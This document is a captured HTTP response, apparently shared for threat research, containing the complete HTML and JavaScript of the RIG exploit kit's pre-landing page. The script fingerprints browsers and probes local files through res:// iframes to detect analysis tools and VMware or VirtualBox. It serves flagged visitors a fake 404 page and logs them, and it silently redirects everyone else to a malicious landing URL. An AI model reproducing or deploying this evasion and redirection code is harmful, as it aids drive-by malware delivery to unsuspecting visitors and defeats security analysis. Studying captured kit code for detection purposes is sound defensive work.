RIG's new pre-landing page

1. HTTP/1.1 200 OK
2. Server: nginx/1.10.1
3. Date: Mon, 06 Mar 2017 22:00:15 GMT
4. Content-Type: text/html; charset=utf-8
5. Transfer-Encoding: chunked
6. Connection: keep-alive
7. Vary: Accept-Encoding
8. X-Powered-By: PHP/5.4.45
9. Expires: Thu, 21 Jul 1977 07:30:00 GMT
10. Last-Modified: Mon, 06 Mar 2017 22:00:15 GMT
11. Cache-Control: max-age=0
12. Pragma: no-cache
13.  
14. ec5
15. <!DOCTYPE html>
16. <html lang="en">
17. <head>
18. <title></title>
19. <meta charset="UTF-8">
20. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
21. <meta name="apple-mobile-web-app-capable" content="yes">
22. <meta name="apple-mobile-web-app-status-bar-style" content="black">
23. <meta name="viewport" content="width=device-width, initial-scale=1.0">
24. </head>
25. <body>
26. <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
27. <script>
28. var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
29. var InfoStr = '';
30. var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
31. var iFrameName = 'myFrame';
32. var debug = false;
33. var isChecked = 0;
34. var appPaths = genPaths();
35.  
36.  
37. function getBrowser() {
38. var ua = navigator.userAgent;
39.  
40. var browsrObj = {
41. browser: 'unknown',
42. browser_real: '',
43. is_bot: false,
44. browser_quality: 0,
45. platform: 'desktop',
46. versionFull: '',
47. versionShort: ''
48. };
49.  
50. try{
51.  
52. var bName = function () {
53. if (ua.search(/Edge/) > -1) return "edge";
54. if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
55. if (ua.search(/Firefox/) > -1) return "firefox";
56. if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
57. if (ua.search(/YaBrowser/) > -1) return "yabrowser";
58. if (ua.search(/Chrome/) > -1) return "chrome";
59. if (ua.search(/Safari/) > -1) return "safari";
60. if (ua.search(/Maxthon/) > -1) return "maxthon";
61. else return "unknown";
62. }();
63.  
64. browsrObj.browser = bName;
65.  
66. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
67.  
68.  
69. var version;
70. if(bName != 'unknown')
71. {
72. switch (bName) {
73. case "edge":
74. version = (ua.split("Edge")[1]).split("/")[1];
75. break;
76. case "ie":
77. if((ua.search(/Trident/) > -1))
78. {
79. version = (ua.split("; rv:")[1]).split(")")[0];
80. }
81. else
82. {
83. version = (ua.split("MSIE ")[1]).split(";")[0];
84. }
85. break;
86. case "firefox":
87. version = ua.split("Firefox/")[1];
88. break;
89. case "opera":
90. version = ua.split("Version/")[1];
91. break;
92. case "operaWebkit":
93. bName = "opera";
94. version = ua.split("OPR/")[1];
95. break;
96. case "yabrowser":
97. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
98. break;
99. case "chrome":
100. version = (ua.split("Chrome/")[1]).split(" ")[0];
101. break;
102. case "safari":
103. version = (ua.split("Version/")[1]).split(" ")[0];
104. break;
105. case "maxthon":
106. version = ua.split("Maxthon/")[1];
107. break;
108.  
109. }
110.  
111. browsrObj.versionFull = version;
112. browsrObj.versionShort = version.split(".")[0];
113. }
114.  
115. } catch (err) {}
116.  
117.  
118. var w=window,d=document;
119. var CorrectBrowser = true;
120. var uaBrowser = browsrObj;
121. var isIE = isChrome = isFirefox = isOpera = 0;
122.  
123. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
124. {
125. if('ActiveXObject' in window) isIE++;
126. if('chrome' in window) isChrome++;
127. if('opera' in window) isOpera++;
128.  
129. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
130.  
131. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
132.  
133.  
134. var f=0;
135. f|='sandbox' in d.createElement('iframe')?1:0;
136. f|='WebSocket' in w?2:0;
137. f|=w.Worker?4:0;
138. f|=w.applicationCache?8:0;
139. f|=w.history && history.pushState?16:0;
140. f|=d.documentElement.webkitRequestFullScreen?32:0;
141. f|='FileReader' in w?64:0;
142.  
143.  
144. if(f==0) isIE++;
145.  
146. if(isIE > 0)
147. {
148. browsrObj.browser_real = 'ie';
149. browsr
150. 1000
151. Obj.browser_quality = isIE;
152. }
153. if(isChrome > 1 && isFirefox == 0)
154. {
155. browsrObj.browser_real = 'chrome';
156. browsrObj.browser_quality = isChrome;
157. }
158. if(isFirefox > 0 && isChrome == 0)
159. {
160. browsrObj.browser_real = 'firefox';
161. browsrObj.browser_quality = isFirefox;
162. }
163.  
164. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
165. }
166.  
167. InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
168.  
169. return browsrObj;
170. }
171.  
172. function deb(o) {
173. if (!debug) return false;
174. console.log(o);
175. }
176.  
177. function getInternetExplorerVersion() {
178. var rv = -1;
179. if (navigator.appName == 'Microsoft Internet Explorer') {
180. var ua = navigator.userAgent;
181. var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
182. if (re.exec(ua) != null)
183. rv = parseFloat( RegExp.$1 );
184. } else if (navigator.appName == 'Netscape') {
185. var ua = navigator.userAgent;
186. var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
187. if (re.exec(ua) != null)
188. rv = parseFloat( RegExp.$1 );
189. }
190. return rv;
191. }
192.  
193.  
194. function createiFrame(c){
195. var d=document.createElement('iframe');
196. d.setAttribute('id',iFrameName+c);
197. d.setAttribute('name',iFrameName+c);
198. d.style['width']='1px'
199. d.style['height']='1px';
200.  
201. function zrs(){objectCheckState(c);}
202. function zlo(){countFrameLoaded(c);}
203.  
204. if (getInternetExplorerVersion()==11) {
205. d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
206. d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
207. } else {
208. if(d['addEventListener']){
209. d['addEventListener']('readystatechange',zrs,false);
210. d['addEventListener']('load',zlo,false);
211. }else {
212. if(d['attachEvent']){
213. d['attachEvent']('on'+'readystatechange',zrs);
214. d['attachEvent']('on'+'load',zlo);
215. }
216. }
217. }
218.  
219. d.setAttribute('src',appPaths[c]['res']);
220. document.body.appendChild(d);
221. }
222.  
223. function objectCheckState(c){
224. if (getInternetExplorerVersion()==11) {
225. if (!appPaths[c]['stateIterate']) appPaths[c]['stateIterate']=1; else appPaths[c]['stateIterate']++;
226. }
227.  
228. var rs = document.getElementById(iFrameName+c).readyState;
229. if (!appPaths[c][rs]) appPaths[c][rs]=1; else appPaths[c][rs]++;
230. }
231.  
232.  
233. function countFrameLoaded(c){
234. var _cfl_appName=appPaths[c]['name'];
235. var _cfl_appType=appPaths[c]['type'];
236. if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
237. foundObjects.push(_cfl_appName);
238. } else {
239. };
240. framesLoaded++;
241. if (framesLoaded==appsCount) {
242. finishChecking();
243. }
244. }
245.  
246.  
247. function finishChecking()
248. {
249.  
250. BrowserInfo = getBrowser();
251. isChecked++;
252.  
253. if (foundObjects.length>0) {
254. dopStr = 'VM';
255. for (i in foundObjects) {
256. //dopStr = dopStr+'_'+foundObjects[i];
257. }
258. InfoStr =InfoStr+dopStr;
259. }
260.  
261. if(BrowserInfo.is_bot == true || foundObjects.length>0)
262. {
263. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
264. }
265. else
266. {
267. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
268. }
269.  
270. var b=0;
271. for(b=0;b<appsCount;b++){
272. deleteiFrame('myFrame'+b);
273. }
274. }
275.  
276.  
277. function deleteiFrame(c){
278. var d=document.getElementById(c);
279. d.parentNode.removeChild(d);
280. }
281.  
282. function genPaths() {
283.  
284. var path_sys32 = '\\Windows\\System32\\drivers\\',
285. path_pf = 'C:\\Program Files\\',
286. path_pfx86 = 'C:\\Program Files (x86)\\';
287.  
288. var appPath = [
289. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
290. {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
291. {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
292. /*{name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
293. {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
294. */
295. {na
296. 921
297. me:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
298. {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
299. {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
300. ];
301.  
302. var appPathsCompilled = [];
303. for(var i=0;i<appPath.length;i++) {
304. if (appPath[i]['filetype']=='driver') {
305. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
306. }
307.  
308. if (appPath[i]['filetype']=='pf') {
309. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
310. appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
311. }
312. }
313.  
314. return appPathsCompilled;
315. }
316.  
317. function go()
318. {
319. foundObjects=[];
320. appsCount=appPaths.length;
321. framesLoaded=0;
322. iFrameObject={};
323.  
324. for(var c=0;c<appsCount;c++){
325. if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
326. createiFrame(c);
327. }
328.  
329. if(isChecked == false)
330. {
331. BrowserInfo = getBrowser();
332. if(BrowserInfo.is_bot == true)
333. {
334. document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
335. }
336. else
337. {
338. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
339. //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
340. }
341. }
342. }
343.  
344. </script>
345.  
346. 0